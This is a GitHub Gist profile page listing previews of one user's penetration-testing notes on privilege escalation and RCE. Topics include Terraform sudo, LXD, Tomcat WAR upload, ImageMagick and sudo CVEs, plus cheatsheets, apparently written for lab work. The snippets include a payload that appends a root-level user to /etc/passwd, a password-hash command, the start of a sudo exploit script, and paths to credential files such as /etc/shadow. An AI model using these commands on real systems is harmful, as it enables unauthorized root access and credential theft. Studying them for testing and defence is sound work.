Skip to content

Instantly share code, notes, and snippets.

View strikoder's full-sized avatar
:shipit:
Imposter Syndrome

$tr!k0d3r strikoder

:shipit:
Imposter Syndrome
View GitHub Profile
@strikoder
strikoder / Terraform Sudo Privilege Escalation.md
Last active January 11, 2026 16:10
Privilege escalation using sudo on Terraform through various methods

Terraform Sudo Privilege Escalation

Method 1: File Overwrite via Symlink Attack

Option A: /etc/passwd (Add root user)

# Generate MD5 password hash
openssl passwd -1 abcd1234
# Example output: $1$xyz$abc123...
@strikoder
strikoder / lxd-lxc-privilege-escalation.md
Created December 30, 2025 18:22
LXD/LXC privilege escalation guide covering reconnaissance, 3 exploitation methods (existing images, distrobuilder, alpine-builder), and post-exploitation techniques for gaining root access.

LXC/LXD Privilege Escalation

Overview

Members of the lxd or lxc group can escalate privileges to root by abusing container functionality. Privileged containers (security.privileged=true) interact with the host filesystem as root, allowing full system access when the host root is mounted inside the container.

Reconnaissance

Before exploiting, check if container images already exist on the target system:

@strikoder
strikoder / Tomcat-Manager-WAR-RCE-Upload.md
Last active June 1, 2026 21:40
Apache Tomcat 7-9 Manager RCE via WAR deployment - Exploit authenticated access to deploy malicious WAR files for remote code execution

Exploitation Steps

1. Test API Access & Validate Credentials

# Set variables
USER="tomcat"
PASS="password"
RHOST="10.10.10.194"
RPORT="8080"
@strikoder
strikoder / ImageMagick-LFI-Profile-Exploit-CVE-2022-44268.md
Created December 30, 2025 09:06
ImageMagick 7.1.0-49 LFI (CVE-2022-44268) - Read arbitrary files through malicious PNG with embedded Profile field, exploiting metadata processing to extract sensitive data

ImageMagick LFI via Profile Metadata Injection (CVE-2022-44268)

Vulnerability Overview

CVE-2022-44268 affects ImageMagick 7.1.0-49 and allows arbitrary file read through crafted PNG images. This exploit chain leverages two vulnerabilities:

  1. DoS via - filename: Providing - as a filename causes the program to hang
  2. LFI via Profile metadata: Injecting a Profile field into image metadata allows reading arbitrary files

Scenario

  • Target: ImageMagick 7.1.0-49 processing images
  • Attack Vector: Malicious PNG with embedded Profile metadata
@strikoder
strikoder / ImageMagick AppImage LD_LIBRARY_PATH Exploit (CVE-2024-41817).md
Last active December 30, 2025 08:48
ImageMagick vulnerability CVE-2024-41817 - Arbitrary Code Execution via LD_LIBRARY_PATH injection when writable image directory exists.

Vulnerability Overview

CVE-2024-41817 affects ImageMagick AppImage versions ≤7.1.1-35. The AppRun script incorrectly sets LD_LIBRARY_PATH with empty paths, causing ImageMagick to load shared libraries from the current working directory.

Scenario

image
  • Target: System running identify command from ImageMagick (/usr/bin/ImageMagick identify)
  • Command: identify >>metadata.log (processing images in a directory)
  • Writable Directory: /images (or similar directory where we have write access)
@strikoder
strikoder / happy-dom-CVE-2024-51757-privilege-escalation.md
Last active December 29, 2025 12:54
Proof of concept for CVE-2024-51757 - Happy-DOM privilege escalation vulnerability via /etc/passwd injection

CVE-2024-51757: Happy-DOM Privilege Escalation

Proof of Concept

Step 1: Create Payload Script

File: /tmp/payload.sh

#!/bin/sh
echo 'strikoder:$1$xyz$AtdNQIrMzNYyjUT1XH5IU1:0:0:root:/root:/bin/bash' >> /etc/passwd #su strikoder:abcd1234####
@strikoder
strikoder / CVE-2025-32463 - Sudo Privilege Escalation (1.9.14-1.9.17).md
Last active March 7, 2026 07:54
Privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. Allows local users to gain root privileges

CVE-2025-32463 (chroot/chwoot) - Sudo Privilege Escalation Exploit

Quick Run

chmod +x exploit.sh && ./exploit.sh

Exploit Code (exploit.sh)

#!/bin/bash
STAGE=$(mktemp -d /tmp/sudostage.XXXX)
cd "$STAGE"
@strikoder
strikoder / NXC (NetExec) Cheatsheet.md
Created December 1, 2025 12:02
NetExec (NXC) Complete Cheatsheet - Comprehensive reference for network penetration testing with SMB, LDAP, WinRM, RDP, MSSQL, SSH, FTP, VNC, and WMI protocols. Includes password spraying, credential dumping, domain enumeration, and lateral movement techniques.

NXC (NetExec) Cheatsheet

Complete reference for NetExec (NXC) - the network execution tool for pentesting

Version Note: This cheatsheet is based on the latest NetExec version. Always check nxc <protocol> --help and nxc <protocol> -L for your specific version.

Installation

pipx install netexec
# or
@strikoder
strikoder / notion-clean-sidebar.css
Created December 1, 2025 07:17
Clean Notion Sidebar - Remove default navigation items, workspace switcher, and dividers for a minimal sidebar experience
/*
* Clean Notion Sidebar
* Removes default navigation items and workspace switcher for a cleaner look
*
* How to use:
* 1. Install Stylus extension (Chrome/Firefox/Edge)
* 2. Create new style in Stylus
* 3. Copy and paste this CSS
* 4. Set to apply to domain: notion.so
* 5. Save and refresh Notion
@strikoder
strikoder / Windows & Linux File Paths Reference.md
Last active December 1, 2025 20:29
Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)

Linux & Windows Sensitive Paths Cheatsheet

LINUX

Files

/etc/passwd
/etc/shadow
/etc/profile
/etc/issue